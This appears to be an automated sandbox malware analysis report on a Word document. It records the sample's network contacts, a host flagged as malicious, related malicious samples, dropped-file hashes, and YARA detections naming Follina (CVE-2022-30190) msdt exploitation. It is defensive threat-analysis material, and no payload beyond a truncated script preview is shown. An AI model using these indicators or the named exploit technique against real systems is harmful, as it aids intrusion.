https://graph.ppe.windows.net | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://my.microsoftpersonalcontent.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://store.office.cn/addinstemplate | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://api.aadrm.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://globaldisco.crm.dynamics.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://messaging.engagement.office.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://dev0-api.acompli.net/autodetect | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://api.diagnosticssdf.office.com/v2/feedback | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://api.powerbi.com/v1.0/myorg/groups | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://web.microsoftstream.com/video/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://api.addins.store.officeppe.com/addinstemplate | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://dataservice.o365filtering.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://ncus.contentsync. | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
http://weather.service.msn.com/data.aspx | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://apis.live.net/v5.0/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://messaging.lifecycle.office.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://management.azure.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://outlook.office365.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://wus2.contentsync. | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://clients.config.office.net/user/v1.0/ios | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://insertmedia.bing.office.net/odc/insertmedia | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://o365auditrealtimeingestion.manage.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://outlook.office365.com/api/v1.0/me/Activities | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://api.office.net | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://incidents.diagnosticssdf.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://entitlement.diagnostics.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://substrate.office.com/search/api/v2/init | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://outlook.office.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://storage.live.com/clientlogs/uploadlocation | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://outlook.office365.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://webshell.suite.office.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://substrate.office.com/search/api/v1/SearchHistory | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://management.azure.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://messaging.lifecycle.office.com/getcustommessage16 | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://login.windows.net/common/oauth2/authorize | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://api.powerbi.com/beta/myorg/imports | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://devnull.onenote.com | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://messaging.action.office.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://ncus.pagecontentsync. | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | URL Reputation: safe | unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
https://messaging.office.com/ | 616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
143.198.109.79 | www.malwarejake.com | United States | 15557 | LDCOMNETFR | true
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 686090
Start date and time: 2022-08-18 08:33:40 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 47s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: qoIZSkdejM.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 25
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winDOCX@14/31@2/1
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .docx
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.12.22, 52.109.76.34, 52.109.76.36, 52.109.88.39, 52.109.76.33
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, pastebin.com, ris.api.iris.microsoft.com, g.msn.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
No simulations
                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            143.198.109.79qoIZSkdejM.docxGet hashmaliciousBrowse
                                                                                                                                                              No context
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              LDCOMNETFRqoIZSkdejM.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              micIUMDDI8Get hashmaliciousBrowse
                                                                                                                                                              • 93.7.241.72
                                                                                                                                                              IDTkPkfSPqGet hashmaliciousBrowse
                                                                                                                                                              • 86.67.2.79
                                                                                                                                                              YUXGuHu2g2Get hashmaliciousBrowse
                                                                                                                                                              • 80.124.112.44
                                                                                                                                                              B1q7pxY7YPGet hashmaliciousBrowse
                                                                                                                                                              • 84.100.235.154
                                                                                                                                                              GUWBakg2SJGet hashmaliciousBrowse
                                                                                                                                                              • 77.158.57.185
                                                                                                                                                              SecuriteInfo.com.Linux.Siggen.9999.14754.14903Get hashmaliciousBrowse
                                                                                                                                                              • 86.72.230.25
                                                                                                                                                              SecuriteInfo.com.Linux.Siggen.9999.11071.28797Get hashmaliciousBrowse
                                                                                                                                                              • 77.130.137.171
                                                                                                                                                              kxmHWYv2abGet hashmaliciousBrowse
                                                                                                                                                              • 109.20.145.124
                                                                                                                                                              arm-20220816-1117Get hashmaliciousBrowse
                                                                                                                                                              • 86.76.114.110
                                                                                                                                                              i686-20220816-1117Get hashmaliciousBrowse
                                                                                                                                                              • 93.31.102.164
                                                                                                                                                              cKr3pNwuY7Get hashmaliciousBrowse
                                                                                                                                                              • 86.68.24.206
                                                                                                                                                              home.armGet hashmaliciousBrowse
                                                                                                                                                              • 80.124.112.19
                                                                                                                                                              home.x86Get hashmaliciousBrowse
                                                                                                                                                              • 86.78.205.215
                                                                                                                                                              home.arm7Get hashmaliciousBrowse
                                                                                                                                                              • 109.24.28.73
                                                                                                                                                              kG7ktScD2lGet hashmaliciousBrowse
                                                                                                                                                              • 109.19.212.46
                                                                                                                                                              r4CbVvNAXpGet hashmaliciousBrowse
                                                                                                                                                              • 84.102.35.204
                                                                                                                                                              skid.x86_64-20220815-1818Get hashmaliciousBrowse
                                                                                                                                                              • 79.85.76.108
                                                                                                                                                              skid.x86-20220815-1818Get hashmaliciousBrowse
                                                                                                                                                              • 84.101.231.202
                                                                                                                                                              skid.mips-20220815-1818Get hashmaliciousBrowse
                                                                                                                                                              • 37.71.38.3
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              ce5f3254611a8c095a3d821d44539877C1ZGt61uGv.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              FzgkVbUkUm.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              YccRHfFd3T.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dl18aYTBo5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              wWLwoD14Xo.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              icRTA4gcSe.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dfqqRjnCV5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              uaMVRwwuyZ.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              NeF7svYyqN.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              yYtTDWoZWx.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              6bdklAYa6u.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              o3MCBdIl7r.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              a2Mx3iJgEo.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              aeXxqezX4E.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              WUumgFooNU.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              SecuriteInfo.com.W32.SmokeLoader.C.genEldorado.4925.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              XBtHx41Ruc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              d67taAtF6k.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Fafp1MozEr.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19A.W.Chesterton PEDIDO DE COMPRA TTY56,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              SmartAlertsSetup.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              SmartAlertsSetup.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              uvGbZYD1Lb.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Dqc1yAO8eA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              xapcmRIAlA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              C1ZGt61uGv.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              FzgkVbUkUm.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              YccRHfFd3T.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dl18aYTBo5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              wWLwoD14Xo.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dfqqRjnCV5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              uaMVRwwuyZ.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Voicemail Audio Transcription.htmGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              https://qsinet-my.sharepoint.com/:f:/g/personal/psg-president_bratislava_qsi_org/EnFNEJXRAKFCtd-FKWV3uzQBTjm7ODr0PXuior0gvBUXAA?e=1zr4UlGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              attached invoice.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              #U260e voice042456432-121_076_454656_3-2(4).htmlGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              3GgEhpsURO.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Facturas Pagadas al VencimientoPDF.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
Match: C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll

Associated Sample Name / URL                Detection
icRTA4gcSe.docx                             malicious
order.docx                                  malicious
Court Fine.doc                              malicious
20220714 DWG.doc                            malicious
purchase order.xlsx                         malicious
WF0SlQWKr1.docx                             malicious
V3g2Pfu707.docx                             malicious
5YMh6S8QVr.docx                             malicious
ZDhoKQk8G6.docx                             malicious
TranQuangDai.docx                           malicious
doc782.docx                                 malicious
68101181_048154.img                         malicious
doc782.docx                                 malicious
doc1712.docx                                malicious
R346ltaP9w.rtf                              malicious
VIP Invitation to Doha Expo 2023.docx       malicious
WykHEO9BQN.rtf                              malicious
lol666 (2).bat                              malicious
EISPv0c56U.doc                              malicious
mjpoc_slide.doc                             malicious

Dropped file
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Microsoft Access Database
Category: dropped
Size (bytes): 528384
Entropy (8bit): 0.4756525200728469
Encrypted: false
SSDEEP: 384:sGfXgDJCOs8SFwfZ0jGBsUvYFcWRfwtZ1Ir+hVZO4Fg:XfXwCVHgZiIcfRf/YI
MD5: 4276AA05788066834944A23FDEEAADEE
SHA1: BE9A0B51E09AB98BD548518F69E4BB1298BABC8A
SHA-256: CC5F605F42E97229A867E727CF5CBDC5093C27E472527D296E67D06A45C1F07E
SHA-512: 19F7830DAD3624E9D4F7BF2669AAD9583C2083E67DA10EAB8525A7BB68E82D4A07F6D5379E242C61645D65386B03FBD0916A3C560DFE5A2896597D8ADD741686
Malicious: false
Preview: ....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...NqU.7...1.(....`.:{6....Z.C8..3..y[e.|*..|......-....f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Dropped file
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 36
Entropy (8bit): 2.730660070105504
Encrypted: false
SSDEEP: 3:5NixJlElGUR:WrEcUR
MD5: 1F830B53CA33A1207A86CE43177016FA
SHA1: BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256: EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512: 502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious: false
Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

Dropped file
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.4172860556164644
Encrypted: false
SSDEEP: 3:lrfFvaV:pNu
MD5: 1606887518E2BDE3B75C37FE72E29138
SHA1: A348F3B8B3162EE8BB1B29B429FF9ABDB2B3B94E
SHA-256: 435C8B933EE5E8CC0D0C14AF682780F20249928A3F26DB0747E7AFFA915B9B3D
SHA-512: 77B537019E6957B4394362BB98FFD8D4D30779401BB2191E5F3D45D2F26F5E8CF52264608EC3CE28493480827C7FEEF16186C12ECDFEF061C23D635D32274087
Malicious: false
Preview: 910646. Admin.

Dropped file
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 148061
Entropy (8bit): 5.35815775838772
Encrypted: false
SSDEEP: 1536:xcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:I1Q9DQe+zuXYr
MD5: B783C72E2293B61E5F09680717F02852
SHA1: 33D74EDD5B0D7CE065E552484B42775E81D2AA43
SHA-256: 66DD5E719DBCBAD6664F2EA89D9317B51E627D709D757DFDD9F955C1E2B1DFB9
SHA-512: 174800A869C136D73EFF92D2EDB87C0DE0AC1E15221779E0818B4910086973DD06F237ED3CC71E7442B10A69097C700597C9EAD2101376B65318CD87012F3C22
Malicious: false
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-18T06:34:43">.. Build: 16.0.15614.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

Dropped file: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 7056
Entropy (8bit): 1.1561718807594425
Encrypted: false
SSDEEP: 24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
MD5: B92EE400BE1F2612B4138031DFC5881E
SHA1: 322065E52393CC668A77A0EB76F33EEC191CC668
SHA-256: 8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
SHA-512: B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
Malicious: true
Yara Hits:
  - Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, Author: Nasreddine Bencherchali, Christian Burkard
  - Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, Author: Tobias Michalski, Christian Burkard
  - Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, Author: Joe Security
Antivirus:
  - Antivirus: Avira, Detection: 100%
Preview: <!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

Dropped file: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 7056
Entropy (8bit): 1.1561718807594425
Encrypted: false
SSDEEP: 24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
MD5: B92EE400BE1F2612B4138031DFC5881E
SHA1: 322065E52393CC668A77A0EB76F33EEC191CC668
SHA-256: 8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
SHA-512: B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
Malicious: true
Yara Hits:
  - Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, Author: Nasreddine Bencherchali, Christian Burkard
  - Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, Author: Tobias Michalski, Christian Burkard
  - Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, Author: Joe Security
Antivirus:
  - Antivirus: Avira, Detection: 100%
